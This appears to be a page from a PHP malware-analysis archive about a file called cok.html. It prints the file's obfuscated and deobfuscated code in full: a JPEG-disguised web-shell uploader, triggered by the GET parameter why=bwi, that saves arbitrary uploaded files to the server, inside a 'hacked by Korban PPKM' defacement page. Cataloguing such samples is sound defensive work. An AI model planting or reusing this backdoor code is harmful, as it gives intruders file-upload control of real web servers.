cok.html

md5: 1db99bc85b61c3794f22a2742f0a2db4

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Environment
error_reporting (Deobfuscated, HTML, Original)

Files
move_uploaded_file (Deobfuscated, HTML, Original)

Input
_FILES (Deobfuscated, HTML, Original)
_GET (Deobfuscated, HTML, Original)

Title
======ND4SMU======hacked by Korban PPKM (<a href="#deobfuscated">Deobfuscated</a>, <a href="#original-code">Original</a>)</li><li>======ND4SMU======hacked by Korban PPKM (<a href="#generated-html">HTML</a>)</li></ul><br><b>URLs</b><br><ul><li>https://fonts.googleapis.com/css?family=Inconsolata& (<a href="#generated-html">HTML</a>)</li><li>https://fonts.googleapis.com/css?family=Inconsolata&display=swap (<a href="#deobfuscated">Deobfuscated</a>, <a href="#original-code">Original</a>)</li><li>https://fonts.googleapis.com/css?family=Sriracha|Ranga|Allan|Architects (<a href="#generated-html">HTML</a>)</li><li>https://g.top4top.io/p_2057ad9lz0.jpg (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li><li>https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li><li>https://l.top4top.io/m_207098prh0.mp3 (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li><li>https://l.top4top.io/m_2070dv1se0.mp3 (<a href="#deobfuscated">Deobfuscated</a>, <a href="#generated-html">HTML</a>, <a href="#original-code">Original</a>)</li></ul><br><hr><h2 id="deobfuscated">Deobfuscated PHP code</h2><pre><code class="language-php">ÿØÿà JFIF     ÿþ/<?php 
error_reporting(0);
if ($_GET["why"] == "bwi") {
    $saw1 = $_FILES["file"]["tmp_name"];
    $saw2 = $_FILES["file"]["name"];
    echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file' /><input type='submit' value='UPload' /></form>";
    move_uploaded_file($saw1, $saw2);
    die(0);
}
?>ÿÛ C ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÛ CÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÀ   " ÿÄ                 ÿÄ                 ÿÄ                 ÿÄ                 ÿÚ   ? ˜ ÿÙ<html><head><title>======ND4SMU======</title></head></html><title>hacked by Korban PPKM</title><link href="https://fonts.googleapis.com/css?family=Inconsolata&display=swap"rel="stylesheet"><meta content="ISD-TEAM"name="description"><meta content="ISD-TEAM"name="keywords"><meta content="index,cache"http-equiv="cache-control"><meta content="index,cache"http-equiv="pragma"><meta content="black"name="theme-color"><center><body bgcolor="black"><div style="height: auto; min-height: 80%;"><div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 20%; left: 50%;"><body bgcolor="black"><img src="https://g.top4top.io/p_2057ad9lz0.jpg"width="500"><br><font color="white"face="Inconsolata"size="6"><font color="red">======={{[[</font> hacked by Korban PPKM <font color="red">]]}}=======</font><br><font size="4"><br><br><font color="red">C0k_J4r4N</font><br><img src="https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif"width="70%"><br><audio autoplay><source src="https://l.top4top.io/m_207098prh0.mp3"type="audio/mpeg"></audio><audio loop><source src="https://l.top4top.io/m_2070dv1se0.mp3"type="audio/mpeg"></audio><script><!--
document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%66%6F%6E%74%73%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%63%73%73%3F%66%61%6D%69%6C%79%3D%53%72%69%72%61%63%68%61%7C%52%61%6E%67%61%7C%41%6C%6C%61%6E%7C%41%72%63%68%69%74%65%63%74%73%20%44%61%75%67%68%74%65%72%7C%54%65%6B%6F%7C%42%75%62%62%6C%65%67%75%6D%20%53%61%6E%73%7C%4E%65%77%20%52%6F%63%6B%65%72%7C%50%61%74%72%69%63%6B%20%48%61%6E%64%7C%4A%6F%6C%6C%79%20%4C%6F%64%67%65%72%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E'));
//--></script></font></font></body><br><br><br></div></div></body></center></code></pre><hr><h2 id="execution_traces">Execution traces</h2><hr><h2 id="generated-html">Generated HTML code</h2><pre><code class="language-html"><html><head></head><body bgcolor="black">Ã¿Ã˜Ã¿Ã&nbsp; JFIF     Ã¿Ã¾/<!--?php
 goto hElwX; hElwX: error_reporting(0); goto iqskR; iqskR: if ($_GET["\167\x68\171"] == "\x62\167\x69") { $saw1 = $_FILES["\146\151\x6c\145"]["\164\x6d\x70\137\x6e\x61\155\x65"]; $saw2 = $_FILES["\x66\151\154\145"]["\156\x61\155\x65"]; echo "\x3c\146\x6f\x72\x6d\40\x6d\145\164\x68\157\x64\75\x27\x50\117\123\x54\x27\40\x65\x6e\x63\x74\x79\x70\145\75\47\155\x75\x6c\x74\x69\160\x61\x72\164\x2f\x66\157\162\x6d\x2d\x64\x61\x74\141\x27\76\x3c\x69\x6e\160\x75\x74\x20\164\x79\x70\x65\75\47\x66\151\x6c\145\x27\40\x6e\x61\155\145\75\47\x66\x69\154\x65\47\x20\57\76\74\x69\156\x70\165\164\40\164\171\x70\145\75\x27\163\165\142\x6d\x69\x74\47\40\x76\141\x6c\165\145\x3d\47\125\120\x6c\157\141\x64\x27\40\57\x3e\74\x2f\x66\157\162\155\x3e"; move_uploaded_file($saw1, $saw2); die(0); } goto tjd38; tjd38: ?-->Ã¿Ã› C Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã› CÃ¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã¿Ã€   " Ã¿Ã„                 Ã¿Ã„                 Ã¿Ã„                 Ã¿Ã„                 Ã¿Ãš   ? Ëœ Ã¿Ã™<title>======ND4SMU======</title><title>hacked by Korban PPKM</title><link href="https://fonts.googleapis.com/css?family=Inconsolata&amp;display=swap" rel="stylesheet"><meta content="ISD-TEAM" name="description"><meta content="ISD-TEAM" name="keywords"><meta content="index,cache" http-equiv="cache-control"><meta content="index,cache" http-equiv="pragma"><meta content="black" name="theme-color"><center><div style="height: auto; min-height: 80%;"><div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 20%; left: 50%;"><img src="https://g.top4top.io/p_2057ad9lz0.jpg" width="500"><br><font color="white" face="Inconsolata" size="6"><font color="red">======={{[[</font> hacked by Korban PPKM <font color="red">]]}}=======</font><br><font size="4"><br><br><font color="red">C0k_J4r4N</font><br><img src="https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif" width="70%"><br><audio autoplay=""><source src="https://l.top4top.io/m_207098prh0.mp3" type="audio/mpeg"></audio><audio loop=""><source src="https://l.top4top.io/m_2070dv1se0.mp3" type="audio/mpeg"></audio><script><!--
document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%66%6F%6E%74%73%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%63%73%73%3F%66%61%6D%69%6C%79%3D%53%72%69%72%61%63%68%61%7C%52%61%6E%67%61%7C%41%6C%6C%61%6E%7C%41%72%63%68%69%74%65%63%74%73%20%44%61%75%67%68%74%65%72%7C%54%65%6B%6F%7C%42%75%62%62%6C%65%67%75%6D%20%53%61%6E%73%7C%4E%65%77%20%52%6F%63%6B%65%72%7C%50%61%74%72%69%63%6B%20%48%61%6E%64%7C%4A%6F%6C%6C%79%20%4C%6F%64%67%65%72%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E'));
//--></script><link href="https://fonts.googleapis.com/css?family=Sriracha|Ranga|Allan|Architects Daughter|Teko|Bubblegum Sans|New Rocker|Patrick Hand|Jolly Lodger" rel="stylesheet"></font></font><br><br><br></div></div></center></body></html></code></pre><hr><h2 id="original-code">Original PHP code</h2><pre><code class="language-php">ÿØÿà JFIF     ÿþ/<?php
 goto hElwX; hElwX: error_reporting(0); goto iqskR; iqskR: if ($_GET["\167\x68\171"] == "\x62\167\x69") { $saw1 = $_FILES["\146\151\x6c\145"]["\164\x6d\x70\137\x6e\x61\155\x65"]; $saw2 = $_FILES["\x66\151\154\145"]["\156\x61\155\x65"]; echo "\x3c\146\x6f\x72\x6d\40\x6d\145\164\x68\157\x64\75\x27\x50\117\123\x54\x27\40\x65\x6e\x63\x74\x79\x70\145\75\47\155\x75\x6c\x74\x69\160\x61\x72\164\x2f\x66\157\162\x6d\x2d\x64\x61\x74\141\x27\76\x3c\x69\x6e\160\x75\x74\x20\164\x79\x70\x65\75\47\x66\151\x6c\145\x27\40\x6e\x61\155\145\75\47\x66\x69\154\x65\47\x20\57\76\74\x69\156\x70\165\164\40\164\171\x70\145\75\x27\163\165\142\x6d\x69\x74\47\40\x76\141\x6c\165\145\x3d\47\125\120\x6c\157\141\x64\x27\40\57\x3e\74\x2f\x66\157\162\155\x3e"; move_uploaded_file($saw1, $saw2); die(0); } goto tjd38; tjd38: ?>ÿÛ C ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÛ CÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÀ   " ÿÄ                 ÿÄ                 ÿÄ                 ÿÄ                 ÿÚ   ? ˜ ÿÙ<html><head><title>======ND4SMU======</title></head></html><title>hacked by Korban PPKM</title><link href="https://fonts.googleapis.com/css?family=Inconsolata&display=swap"rel="stylesheet"><meta content="ISD-TEAM"name="description"><meta content="ISD-TEAM"name="keywords"><meta content="index,cache"http-equiv="cache-control"><meta content="index,cache"http-equiv="pragma"><meta content="black"name="theme-color"><center><body bgcolor="black"><div style="height: auto; min-height: 80%;"><div style="text-align: center; width:800px; margin-left: -400px; position: absolute; top: 20%; left: 50%;"><body bgcolor="black"><img src="https://g.top4top.io/p_2057ad9lz0.jpg"width="500"><br><font color="white"face="Inconsolata"size="6"><font color="red">======={{[[</font> hacked by Korban PPKM <font color="red">]]}}=======</font><br><font size="4"><br><br><font color="red">C0k_J4r4N</font><br><img src="https://i.postimg.cc/wMDjmbym/siyahyuruyen.gif"width="70%"><br><audio autoplay><source src="https://l.top4top.io/m_207098prh0.mp3"type="audio/mpeg"></audio><audio loop><source src="https://l.top4top.io/m_2070dv1se0.mp3"type="audio/mpeg"></audio><script><!--
document.write(unescape('%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%66%6F%6E%74%73%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%63%73%73%3F%66%61%6D%69%6C%79%3D%53%72%69%72%61%63%68%61%7C%52%61%6E%67%61%7C%41%6C%6C%61%6E%7C%41%72%63%68%69%74%65%63%74%73%20%44%61%75%67%68%74%65%72%7C%54%65%6B%6F%7C%42%75%62%62%6C%65%67%75%6D%20%53%61%6E%73%7C%4E%65%77%20%52%6F%63%6B%65%72%7C%50%61%74%72%69%63%6B%20%48%61%6E%64%7C%4A%6F%6C%6C%79%20%4C%6F%64%67%65%72%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%3E'));
//--></script></font></font></body><br><br><br></div></div></body></center></code></pre></div>

<!-- /Malware content -->
    </div>
</div>
<!-- /.row -->




        <!-- Footer -->
        <footer>
            <div class="row">
                <div class="col-lg-12">
                <p>Copyright © Beneri 2024</p>
                </div>
            </div>
            <!-- /.row -->
        </footer>

    </div>
    <!-- /.container -->

    <!-- jQuery -->
    <script src="https://beneri.se/js/jquery.js"></script>

    <!-- Bootstrap Core JavaScript -->
    <script src="https://beneri.se/js/bootstrap.min.js"></script>

</body>

</html>
PHP Malware Analysis

cok.html

md5: 1db99bc85b61c3794f22a2742f0a2db4

Screenshot

Attributes
